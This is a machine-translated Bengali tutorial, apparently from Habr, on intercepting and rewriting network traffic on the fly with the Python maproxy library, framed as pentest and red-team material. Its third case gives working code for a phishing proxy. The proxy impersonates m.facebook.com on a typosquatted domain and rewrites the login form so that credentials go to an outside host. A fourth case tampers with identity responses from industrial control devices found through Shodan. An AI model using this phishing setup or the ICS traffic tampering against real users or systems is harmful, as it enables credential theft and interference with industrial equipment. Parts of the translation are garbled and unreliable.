ফ্লাই নেটওয়ার্ক ডেটা প্রক্রিয়া

নিবন্ধটির অনুবাদ কোর্স শুরুর প্রাক্কালে প্রস্তুত করা হয়েছিল "পেন্টেস্ট। অনুপ্রবেশ পরীক্ষার অনুশীলন".

বিমূর্ত

নিয়মিত পেনিট্রেশন টেস্টিং এবং রেড টিম অপারেশন থেকে শুরু করে IoT/ICS ডিভাইস এবং SCADA হ্যাক করা পর্যন্ত বিভিন্ন ধরনের নিরাপত্তা মূল্যায়নের মধ্যে রয়েছে বাইনারি নেটওয়ার্ক প্রোটোকলের সাথে কাজ করা, অর্থাৎ মূলত ক্লায়েন্ট এবং টার্গেটের মধ্যে নেটওয়ার্ক ডেটা আটকানো এবং পরিবর্তন করা। আমাদের কাছে Wireshark, Tcpdump বা Scapy-এর মতো টুল থাকায় নেটওয়ার্ক ট্র্যাফিক স্নিফিং করা কোনো কঠিন কাজ নয়, কিন্তু পরিবর্তন করা আরও শ্রম-নিবিড় কাজ বলে মনে হয় কারণ নেটওয়ার্ক ডেটা পড়তে, ফিল্টার করতে, পরিবর্তন করার জন্য আমাদের কিছু ধরনের ইন্টারফেস থাকতে হবে। এটি ফ্লাইতে এবং প্রায় রিয়েল টাইমে লক্ষ্য হোস্টে এটিকে ফেরত পাঠান। উপরন্তু, এটি আদর্শ হবে যদি এই ধরনের একটি টুল স্বয়ংক্রিয়ভাবে একাধিক সমান্তরাল সংযোগের সাথে কাজ করতে পারে এবং স্ক্রিপ্ট ব্যবহার করে কাস্টমাইজযোগ্য হতে পারে।

একদিন আমি একটি টুল আবিষ্কার করলাম maproxy, ডকুমেন্টেশন দ্রুত আমার কাছে এটি পরিষ্কার করে দিয়েছে maproxy - শুধু আমার যা প্রয়োজন। এটি একটি মোটামুটি সহজ, বহুমুখী এবং সহজেই কনফিগারযোগ্য TCP প্রক্সি। আমি এই টুলটি অনেকগুলি সমান্তরাল সংযোগগুলি পরিচালনা করতে পারে কিনা তা দেখতে ICS ডিভাইস সহ (যা অনেকগুলি প্যাকেট তৈরি করে) সহ বেশ কয়েকটি মোটামুটি জটিল অ্যাপ্লিকেশনগুলিতে পরীক্ষা করেছি এবং টুলটি ভাল পারফর্ম করেছে৷

এই নিবন্ধটি আপনাকে ফ্লাই ব্যবহার করে নেটওয়ার্ক ডেটা প্রক্রিয়াকরণের সাথে পরিচয় করিয়ে দেবে maproxy.

ওভারভিউ

টুল maproxy পাইথনের একটি জনপ্রিয় এবং পরিণত অ্যাসিঙ্ক্রোনাস নেটওয়ার্কিং ফ্রেমওয়ার্ক টর্নেডোর উপর ভিত্তি করে।

সাধারণভাবে, এটি বিভিন্ন মোডে কাজ করতে পারে:

• TCP:TCP - এনক্রিপ্ট করা TCP সংযোগ;
• TCP:SSL и SSL:TCP - একমুখী এনক্রিপশন সহ;
• SSL:SSL - দ্বি-মুখী এনক্রিপশন।

এটি একটি লাইব্রেরি হিসাবে আসে। একটি দ্রুত শুরু করার জন্য, আপনি উদাহরণ ফাইলগুলি ব্যবহার করতে পারেন যা মূলকে প্রতিফলিত করে৷ লাইব্রেরি ফাংশন:

• all.py
• certificate.pem
• logging_proxy.py
• privatekey.pem
• ssl2ssl.py
• ssl2tcp.py
• tcp2ssl.py
• tcp2tcp.py

কেস 1 - সাধারণ দ্বিমুখী প্রক্সি

উপর ভিত্তি করে tcp2tcp.py:

#!/usr/bin/env python

import tornado.ioloop
import maproxy.proxyserver

server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()

ডিফল্টরূপে ProxyServer() দুটি আর্গুমেন্ট লাগে - সংযোগ অবস্থান এবং লক্ষ্য পোর্ট। server.listen() একটি যুক্তি লাগে - ইনকামিং সংযোগ শোনার জন্য পোর্ট।

স্ক্রিপ্ট কার্যকর করা হচ্ছে:

# python tcp2tcp.py

পরীক্ষা চালানোর জন্য, আমরা আমাদের প্রক্সি স্ক্রিপ্টের মাধ্যমে একটি স্থানীয় SSH সার্ভারের সাথে সংযোগ করতে যাচ্ছি, যা শুনবে 2222/tcp পোর্ট এবং একটি স্ট্যান্ডার্ড পোর্টের সাথে সংযোগ করে 22/tcp SSH সার্ভার:

স্বাগত ব্যানার আপনাকে জানায় যে আমাদের উদাহরণ স্ক্রিপ্ট সফলভাবে নেটওয়ার্ক ট্রাফিক প্রক্সি করেছে।

কেস 2 - ডেটা পরিবর্তন

আরেকটি ডেমো স্ক্রিপ্ট logging_proxy.py নেটওয়ার্ক ডেটার সাথে ইন্টারঅ্যাক্ট করার জন্য আদর্শ। ফাইলের মন্তব্যগুলি ক্লাস পদ্ধতিগুলি বর্ণনা করে যা আপনি আপনার লক্ষ্য অর্জনের জন্য পরিবর্তন করতে পারেন:

সবচেয়ে আকর্ষণীয় জিনিস এখানে:

• on_c2p_done_read - ক্লায়েন্ট থেকে সার্ভারে যাওয়ার পথে ডেটা আটকাতে;
• on_p2s_done_read - বিপরীত।

আসুন SSH ব্যানারটি পরিবর্তন করার চেষ্টা করি যা সার্ভারটি ক্লায়েন্টে ফেরত দেয়:

[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]

স্ক্রিপ্ট চালান:

আপনি দেখতে পাচ্ছেন, ক্লায়েন্টকে বিভ্রান্ত করা হয়েছিল কারণ তার জন্য SSH সার্ভারের নাম পরিবর্তন করা হয়েছিল «DumnySSH».

কেস 3 - সাধারণ ফিশিং ওয়েব পৃষ্ঠা

এই টুল ব্যবহার করার জন্য অন্তহীন উপায় আছে. এইবার রেড টিমের অপারেশনের দিক থেকে আরও ব্যবহারিক কিছুতে ফোকাস করা যাক। এর ল্যান্ডিং পৃষ্ঠা অনুকরণ করা যাক m.facebook.com এবং ইচ্ছাকৃত টাইপো সহ একটি কাস্টম ডোমেন ব্যবহার করুন, উদাহরণস্বরূপ, m.facebok.com. প্রদর্শনের উদ্দেশ্যে, আসুন ধরে নিই যে ডোমেনটি আমাদের দ্বারা নিবন্ধিত।

আমরা ফেসবুক সার্ভারে আমাদের ভিকটিম প্রক্সি এবং SSL স্ট্রীমের সাথে একটি এনক্রিপ্ট করা নেটওয়ার্ক সংযোগ স্থাপন করতে যাচ্ছি (31.13.81.36) এই উদাহরণটি কার্যকর করার জন্য, আমাদের HTTP হোস্ট হেডার প্রতিস্থাপন করতে হবে এবং সঠিক হোস্টনামটি ইনজেক্ট করতে হবে এবং আমরা প্রতিক্রিয়া সংকোচন অক্ষম করব যাতে আমরা সহজেই বিষয়বস্তুগুলি অ্যাক্সেস করতে পারি। শেষ পর্যন্ত আমরা HTML ফর্মটি প্রতিস্থাপন করব যাতে লগইন শংসাপত্রগুলি ফেসবুকের সার্ভারের পরিবর্তে আমাদের কাছে পাঠানো হয়:

[…]
def on_c2p_done_read(self,data):
 # replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response
     data = data.replace("action="/bn/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]

সারসংক্ষেপে:

আপনি দেখতে পাচ্ছেন, আমরা সফলভাবে মূল সাইটটি প্রতিস্থাপন করতে সক্ষম হয়েছি।

কেস 4 - পোর্টিং ইথারনেট/আইপি

আমি বেশ কিছুদিন ধরে শিল্প ডিভাইস এবং সফ্টওয়্যার (ICS/SCADA) নিয়ে কাজ করছি, যেমন প্রোগ্রামেবল কন্ট্রোলার (PLC), I/O মডিউল, ড্রাইভ, রিলে, মই প্রোগ্রামিং পরিবেশ এবং আরও অনেক কিছু। যারা শিল্প জিনিস পছন্দ করেন তাদের জন্য এই কেস। এই জাতীয় সমাধানগুলি হ্যাক করার সাথে সক্রিয়ভাবে নেটওয়ার্ক প্রোটোকলের সাথে খেলা জড়িত। নিম্নলিখিত উদাহরণে, আমি দেখাতে চাই কিভাবে আপনি ICS/SCADA নেটওয়ার্ক ট্র্যাফিক পরিবর্তন করতে পারেন।

এই জন্য আপনার নিম্নলিখিত প্রয়োজন হবে:

• নেটওয়ার্ক স্নিফার, উদাহরণস্বরূপ, Wireshark;
• ইথারনেট/আইপি বা শুধুমাত্র একটি এসআইপি ডিভাইস, আপনি শোডান পরিষেবা ব্যবহার করে এটি খুঁজে পেতে পারেন;
• আমাদের স্ক্রিপ্ট উপর ভিত্তি করে maproxy.

প্রথমে, আসুন দেখি সিআইপি (কমন ইন্ডাস্ট্রিয়াল প্রোটোকল) থেকে একটি সাধারণ সনাক্তকরণ প্রতিক্রিয়া কেমন দেখায়:

ইথারনেট/আইপি প্রোটোকল ব্যবহার করে ডিভাইস শনাক্তকরণ সম্পন্ন করা হয়, যা ইন্ডাস্ট্রিয়াল ইথারনেট প্রোটোকলের একটি বর্ধিত সংস্করণ যা সিআইপি-এর মতো কন্ট্রোল প্রোটোকলগুলিকে আবৃত করে। আমরা হাইলাইট করা আইডি নাম পরিবর্তন করতে যাচ্ছি যা স্ক্রিনশটে দৃশ্যমান "ইথারনেটের জন্য NI-IndComm" আমাদের প্রক্সি স্ক্রিপ্ট ব্যবহার করে। আমরা স্ক্রিপ্ট পুনরায় ব্যবহার করতে পারে logging_proxy.py এবং একইভাবে ক্লাস পদ্ধতি পরিবর্তন করুন on_p2s_done_read, কারণ আমরা ক্লায়েন্টে একটি ভিন্ন পরিচয়ের নাম দেখতে চাই।

কোড:

[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response

 # Checking if we got List Identity message response
     if data[26:28] == b'x0cx00':
         print('Got response, replacing')
         data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
     super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]

মূলত, আমরা দুইবার ডিভাইস সনাক্তকরণের জন্য জিজ্ঞাসা করেছি, দ্বিতীয় প্রতিক্রিয়াটি আসল এবং প্রথমটি ফ্লাইতে পরিবর্তন করা হয়েছিল।

এবং শেষ

আমার মতে maproxy একটি সুবিধাজনক এবং সহজ টুল, যা পাইথনেও লেখা আছে, তাই আমি বিশ্বাস করি আপনিও এটি ব্যবহার করে উপকৃত হতে পারেন। অবশ্যই, নেটওয়ার্ক ডেটা প্রক্রিয়াকরণ এবং পরিবর্তন করার জন্য আরও জটিল সরঞ্জাম রয়েছে, তবে সেগুলি আরও মনোযোগের প্রয়োজন এবং সাধারণত একটি নির্দিষ্ট ব্যবহারের ক্ষেত্রে তৈরি করা হয়, যেমন মুরেনা, মোদলিস্কা বা evilginx তৃতীয় অনুরূপ ক্ষেত্রে, বা canape শেষ মামলার জন্য। এক উপায় বা অন্য, সাহায্য সঙ্গে maproxy আপনি নেটওয়ার্ক ডেটা আটকানোর জন্য আপনার ধারণাগুলি দ্রুত বাস্তবায়ন করতে পারেন, যেহেতু উদাহরণ স্ক্রিপ্টগুলি খুব স্পষ্ট।

উইন্ডোজ এডিতে প্রমাণীকরণ প্রক্রিয়া পরীক্ষা করা হচ্ছে

উত্স: www.habr.com